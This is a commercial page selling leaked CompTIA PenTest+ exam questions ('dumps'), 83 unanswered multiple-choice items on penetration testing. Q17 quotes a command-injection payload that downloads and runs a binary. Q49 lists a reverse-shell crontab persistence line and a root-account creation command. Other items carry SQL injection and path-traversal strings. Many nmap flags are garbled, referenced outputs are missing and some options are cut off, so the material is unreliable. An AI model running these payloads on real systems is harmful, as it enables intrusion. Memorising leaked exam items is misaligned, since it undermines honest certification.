Tested PT0-002 Exam Dumps - Fosters Your Exam Passing Skills

Tested PT0-002 Exam Dumps – Fosters Your Exam Passing Skills

Jonnie Karnath2023-03-23T11:14:50+00:00

Are you planning to take the CompTIA PT0-002 exam soon and want to ensure you pass with flying colors? Look no further than Certspots, the leading provider of the latest PT0-002 exam dumps designed to help you foster your exam passing skills. At Certspots, we understand how important it is for you to succeed in your PT0-002 exam, which is why we offer the most comprehensive and up-to-date collection of PT0-002 exam dumps available. Our team of expert trainers and certified professionals have curated a wide range of PT0-002 exam dumps that cover all the important topics and areas of the exam, ensuring that you are fully prepared for any question that comes your way.

Page 1 of 9

1. The attacking machine is on the same LAN segment as the target host during an internal penetration test.

Which of the following commands will BEST enable the attacker to conduct host delivery and write the discovery to files without returning results of the attack machine?

nmap snn exclude 10.1.1.15 10.1.1.0/24 oA target_txt

nmap iR10oX out.xml | grep Nmap | cut d "f5 > live-hosts.txt

nmap PnsV OiL target.txt A target_text_Service

nmap sSPn n iL target.txt A target_txtl

2. A penetration tester conducted a vulnerability scan against a client’s critical servers and found the following:

Which of the following would be a recommendation for remediation?

Deploy a user training program

Implement a patch management plan

Utilize the secure software development life cycle

Configure access controls on each of the servers

3. A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks.

Which of the following is the BEST method available to pivot and gain additional access to the network?

Set up a captive portal with embedded malicious code.

Capture handshakes from wireless clients to crack.

Span deauthentication packets to the wireless clients.

Set up another access point and perform an evil twin attack.

4. A penetration tester logs in as a user in the cloud environment of a company.

Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

iam_enum_permissions

iam_privesc_scan

iam_backdoor_assume_role

iam_bruteforce_permissions

5. A compliance-based penetration test is primarily concerned with:

obtaining Pll from the protected network.

bypassing protection on edge devices.

determining the efficacy of a specific set of security standards.

obtaining specific information from the protected network.

6. A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.

Which of the following Nmap scan syntaxes would BEST accomplish this objective?

nmap -sT -vvv -O 192.168.1.2/24 -PO

nmap -sV 192.168.1.2/24 -PO

nmap -sA -v -O 192.168.1.2/24

nmap -sS -O 192.168.1.2/24 -T1

7. When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?

Clarify the statement of work.

Obtain an asset inventory from the client.

Interview all stakeholders.

Identify all third parties involved.

8. A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers.

When engaging with a penetration-testing company to test the application, which of the following should the company avoid?

Crawling the web application's URLs looking for vulnerabilities

Fingerprinting all the IP addresses of the application's servers

Brute forcing the application's passwords

Sending many web requests per second to test DDoS protection

9. A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment.

Which of the following would have MOST effectively prevented this misunderstanding?

Prohibiting exploitation in the production environment

Requiring all testers to review the scoping document carefully

Never assessing the production networks

Prohibiting testers from joining the team during the assessment

10. A penetration tester wants to find hidden information in documents available on the web at a particular domain.

Which of the following should the penetration tester use?

Netcraft

CentralOps

Responder

FOCA

Page 2 of 9

11. A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift.

Which of the following social-engineering attacks was the tester utilizing?

Phishing

Tailgating

Baiting

Shoulder surfing

12. Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

To provide feedback on the report structure and recommend improvements

To discuss the findings and dispute any false positives

To determine any processes that failed to meet expectations during the assessment

To ensure the penetration-testing team destroys all company data that was gathered during the test

13. A penetration tester wants to scan a target network without being detected by the client’s IDS.

Which of the following scans is MOST likely to avoid detection?

nmap Cp0 CT0 CsS 192.168.1.10

nmap CsA CsV --host-timeout 60 192.168.1.10

nmap Cf --badsum 192.168.1.10

nmap CA Cn 192.168.1.10

14. Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?

Scraping social media for personal details

Registering domain names that are similar to the target company's

Identifying technical contacts at the company

Crawling the company's website for company information

15. A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data.

Which of the following should the tester do with this information to make this a successful exploit?

Perform XS

Conduct a watering-hole attack.

Use BeE

Use browser autopwn.

16. A penetration tester is examining a Class C network to identify active systems quickly.

Which of the following commands should the penetration tester use?

nmap sn 192.168.0.1/16

nmap sn 192.168.0.1-254

nmap sn 192.168.0.1 192.168.0.1.254

nmap sN 192.168.0.0/24

17. A penetration tester was able to gain access to a system using an exploit.

The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

grep Cv apache ~/.bash_history > ~/.bash_history

rm Crf /tmp/apache

chmod 600 /tmp/apache

taskkill /IM “apache” /F

18. 1.The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A birthday attack on 64-bit ciphers (Sweet32)

An attack that breaks RC4 encryption

An attack on a session ticket extension (Ticketbleed)

A Heartbleed attack

19. Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

To remove hash-cracking registry entries

To remove the tester-created Mimikatz account

To remove tools from the server

To remove a reverse shell from the system

20. A penetration tester runs the unshadow command on a machine.

Which of the following tools will the tester most likely use NEXT?

John the Ripper

Hydra

Mimikatz

Cain and Abel

Page 3 of 9

21. A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours.

Which of the following BEST describes why this would be necessary?

To meet PCI DSS testing requirements

For testing of the customer's SLA with the ISP

Because of concerns regarding bandwidth limitations

To ensure someone is available if something goes wrong

22. A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability.

Which of the following should the penetration tester consider BEFORE running a scan?

The timing of the scan

The bandwidth limitations

The inventory of assets and versions

The type of scan

23. In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>.

Which of the following would be the best action for the tester to take NEXT with this information?

Create a custom password dictionary as preparation for password spray testing.

Recommend using a password manage/vault instead of text files to store passwords securely.

Recommend configuring password complexity rules in all the systems and applications.

Document the unprotected file repository as a finding in the penetration-testing report.

24. A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company’s web presence.

Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

IP addresses and subdomains

Zone transfers

DNS forward and reverse lookups

Internet search engines

Externally facing open ports

Shodan results

25. A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011.

Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

Nmap

tcpdump

Scapy

hping3

26. A security analyst needs to perform an on-path attack on BLE smart devices.

Which of the following tools would be BEST suited to accomplish this task?

Wireshark

Gattacker

tcpdump

Netcat

27. A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary.

Which of the following vulnerabilities is the security consultant MOST likely to identify?

Weak authentication schemes

Credentials stored in strings

Buffer overflows

Non-optimized resource management

28. An assessor wants to run an Nmap scan as quietly as possible.

Which of the following commands will give the LEAST chance of detection?

nmap -"T3 192.168.0.1

nmap - "P0 192.168.0.1

nmap - T0 192.168.0.1

nmap - A 192.168.0.1

29. A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements.

Which of the following settings in Shodan would meet the client’s requirements?

“cisco-ios” “admin+1234”

“cisco-ios” “no-password”

“cisco-ios” “default-passwords”

“cisco-ios” “last-modified”

30. A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host.

Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

tcpdump

Snort

Nmap

Netstat

Fuzzer

Page 4 of 9

31. PCI DSS requires which of the following as part of the penetration-testing process?

The penetration tester must have cybersecurity certifications.

The network must be segmented.

Only externally facing systems should be tested.

The assessment must be performed during non-working hours.

32. Which of the following BEST describe the OWASP Top 10? (Choose two.)

The most critical risks of web applications

A list of all the risks of web applications

The risks defined in order of importance

A web-application security standard

A risk-governance and compliance framework

A checklist of Apache vulnerabilities

33. A company recruited a penetration tester to configure wireless IDS over the network.

Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

Aircrack-ng

Wireshark

Wifite

Kismet

34. A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices.

Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?

Send an SMS with a spoofed service number including a link to download a malicious application.

Exploit a vulnerability in the MDM and create a new account and device profile.

Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading.

Infest a website that is often used by employees with malware targeted toward x86 architectures.

35. Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

Shodan

Nmap

WebScarab-NG

Nessus

36. Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)

OWASP ZAP

Nmap

Nessus

BeEF

Hydra

Burp Suite

37. A penetration tester is looking for vulnerabilities within a company's web application that are in scope. The penetration tester discovers a login page and enters the following string in a field:

1; SELECT Username, Password FROM Users;

Which of the following injection attacks is the penetration tester using?

Blind SQL

Boolean SQL

Stacked queries

Error-based

38. A penetration tester gains access to a system and is able to migrate to a user process:

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

Redirecting output from a file to a remote system

Building a scheduled task for execution

Mapping a share to a remote system

Executing a file on the remote system

Creating a new process on all domain systems

Setting up a reverse shell from a remote system

Adding an additional IP address on the compromised system

39. A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment.

Using Scapy, the tester runs the following command:

Which of the following represents what the penetration tester is attempting to accomplish?

DNS cache poisoning

MAC spoofing

ARP poisoning

Double-tagging attack

40. A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment.

Which of the following would be the BEST option to identify a system properly prior to performing the assessment?

Asset inventory

DNS records

Web-application scan

Full scan

Page 5 of 9

41. A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract.

Which of the following concerns would BEST support the software company’s request?

The reverse-engineering team may have a history of selling exploits to third parties.

The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.

The reverse-engineering team will be given access to source code for analysis.

42. Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

After detection of a breach

After a merger or an acquisition

When an organization updates its network firewall configurations

When most of the vulnerabilities have been remediated

43. A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building.

Which of the following techniques would be BEST to use to gain confidential information?

Badge cloning

Dumpster diving

Tailgating

Shoulder surfing

44. A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service.

Which of the following methods would BEST support validation of the possible findings?

Manually check the version number of the VoIP service against the CVE release

Test with proof-of-concept code from an exploit database

Review SIP traffic from an on-path position to look for indicators of compromise

Utilize an nmap CsV scan against the service

45. HOTSPOT

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

46. A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.

Which of the following was captured by the testing team?

Multiple handshakes

IP addresses

Encrypted file transfers

User hashes sent over SMB

47. The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a “probable port scan” alert in the organization’s IDS?

Line 01

Line 02

Line 07

Line 08

48. A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application.

Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?

SQLmap

DirBuster

w3af

OWASP ZAP

49. A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop.

Which of the following can be used to ensure the tester is able to maintain access to the system?

schtasks /create /sc /ONSTART /tr C:TempWindowsUpdate.exe

wmic startup get caption,command

crontab Cl; echo “@reboot sleep 200 && ncat Clvp 4242 Ce /bin/bash”) | crontab 2>/dev/null

sudo useradd Cou 0 Cg 0 user

50. Appending string values onto another string is called:

compilation

connection

concatenation

conjunction

Page 6 of 9

51. A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras.

Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

Pick a lock.

Disable the cameras remotely.

Impersonate a package delivery worker.

Send a phishing email.

52. CORRECT TEXT

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

53. A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP.

Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

Key reinstallation

Deauthentication

Evil twin

Replay

54. A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

Telnet

HTTP

SMTP

DNS

NTP

SNMP

55. A tester who is performing a penetration test on a website receives the following output:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62

Which of the following commands can be used to further attack the website?

../../../../../../../../../../etc/passwd

/var/www/html/index.php;whoami

1 UNION SELECT 1, DATABASE(),3--

56. A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food.

Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?

Tailgating

Dumpster diving

Shoulder surfing

Badge cloning

57. A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host.

Which of the following utilities would BEST support this objective?

Socat

tcpdump

Scapy

dig

58. A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines.

Which of the following documents could hold the penetration tester accountable for this action?

ROE

SLA

MSA

NDA

59. A company requires that all hypervisors have the latest available patches installed.

Which of the following would BEST explain the reason why this policy is in place?

To provide protection against host OS vulnerabilities

To reduce the probability of a VM escape attack

To fix any misconfigurations of the hypervisor

To enable all features of the hypervisor

60. A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

Nessus

ProxyChains

OWASPZAP

Empire

Page 7 of 9

61. During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng.

Which of the following should be recommended to the client to remediate this issue?

Changing to Wi-Fi equipment that supports strong encryption

Using directional antennae

Using WEP encryption

Disabling Wi-Fi

62. A client has requested that the penetration test scan include the following UDP services:

SNMP, NetBIOS, and DNS.

Which of the following Nmap commands will perform the scan?

nmap Cvv sUV Cp 53, 123-159 10.10.1.20/24 CoA udpscan

nmap Cvv sUV Cp 53,123,161-162 10.10.1.20/24 CoA udpscan

nmap Cvv sUV Cp 53,137-139,161-162 10.10.1.20/24 CoA udpscan

nmap Cvv sUV Cp 53, 122-123, 160-161 10.10.1.20/24 CoA udpscan

63. Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

A quick description of the vulnerability and a high-level control to fix it

Information regarding the business impact if compromised

The executive summary and information regarding the testing company

The rules of engagement from the assessment

64. A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:

comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org.

3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org.

Which of the following potential issues can the penetration tester identify based on this output?

At least one of the records is out of scope.

There is a duplicate MX record.

The NS record is not within the appropriate domain.

The SOA records outside the comptia.org domain.

65. A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks.

Which of the following methodologies should be used to BEST meet the client's expectations?

OWASP Top 10

MITRE ATT&CK framework

NIST Cybersecurity Framework

The Diamond Model of Intrusion Analysis

66. An Nmap network scan has found five open ports with identified services.

Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

OpenVAS

Drozer

Burp Suite

OWASP ZAP

67. A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.

Which of the following changes should the tester apply to make the script work as intended?

Change line 2 to $ip= 10.192.168.254;

Remove lines 3, 5, and 6.

Remove line 6.

Move all the lines below line 7 to the top of the script.

68. Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

The CVSS score of the finding

The network location of the vulnerable device

The vulnerability identifier

The client acceptance form

The name of the person who found the flaw

The tool used to find the issue

69. An Nmap scan of a network switch reveals the following:

Which of the following technical controls will most likely be the FIRST recommendation for this device?

Encrypted passwords

System-hardening techniques

Multifactor authentication

Network segmentation

70. During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers.

To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

Vulnerability scanning

Network segmentation

System hardening

Intrusion detection

Page 8 of 9

71. A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.

Which of the following is the BEST way to ensure this is a true positive?

Run another scanner to compare.

Perform a manual test on the server.

Check the results on the scanner.

Look for the vulnerability online.

72. A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers.

Which of the following is MOST likely causing the TCP resets to occur during the assessment?

The web server is using a WA

The web server is behind a load balancer.

The web server is redirecting the requests.

The local antivirus on the web server Is rejecting the connection.

73. Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

Website scraping

Website cloning

Domain enumeration

URL enumeration

74. A penetration tester receives the following results from an Nmap scan:

Which of the following OSs is the target MOST likely running?

CentOS

Arch Linux

Windows Server

Ubuntu

75. In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers.

Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

Test for RFC-defined protocol conformance.

Attempt to brute force authentication to the service.

Perform a reverse DNS query and match to the service banner.

Check for an open relay configuration.

76. A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM.

Which of the following cloud attacks did the penetration tester MOST likely implement?

Direct-to-origin

Cross-site scripting

Malware injection

Credential harvesting

77. A client evaluating a penetration testing company requests examples of its work.

Which of the following represents the BEST course of action for the penetration testers?

Redact identifying information and provide a previous customer's documentation.

Allow the client to only view the information while in secure spaces.

Determine which reports are no longer under a period of confidentiality.

Provide raw output from penetration testing tools.

78. A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal.

Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Edit the discovered file with one line of code for remote callback

Download .pl files and look for usernames and passwords

Edit the smb.conf file and upload it to the server

Download the smb.conf file and look at configurations

79. The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.

This device is most likely a gateway with in-band management services.

This device is most likely a proxy server forwarding requests over TCP/443.

This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

80. A penetration tester is reviewing the following SOW prior to engaging with a client:

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection

Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team

Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address

Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop

Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements

Page 9 of 9

81. A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant.

Which of the following is the MINIMUM frequency to complete the scan of the system?

Weekly

Monthly

Quarterly

Annually

82. A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository.

After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

Hydra and crunch

Netcat and cURL

Burp Suite and DIRB

Nmap and OWASP ZAP

83. During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses.

Which of the following techniques should the penetration tester perform NEXT?

Badge cloning

Watering-hole attack

Impersonation

Spear phishing

Facebook Twitter LinkedIn Google + Email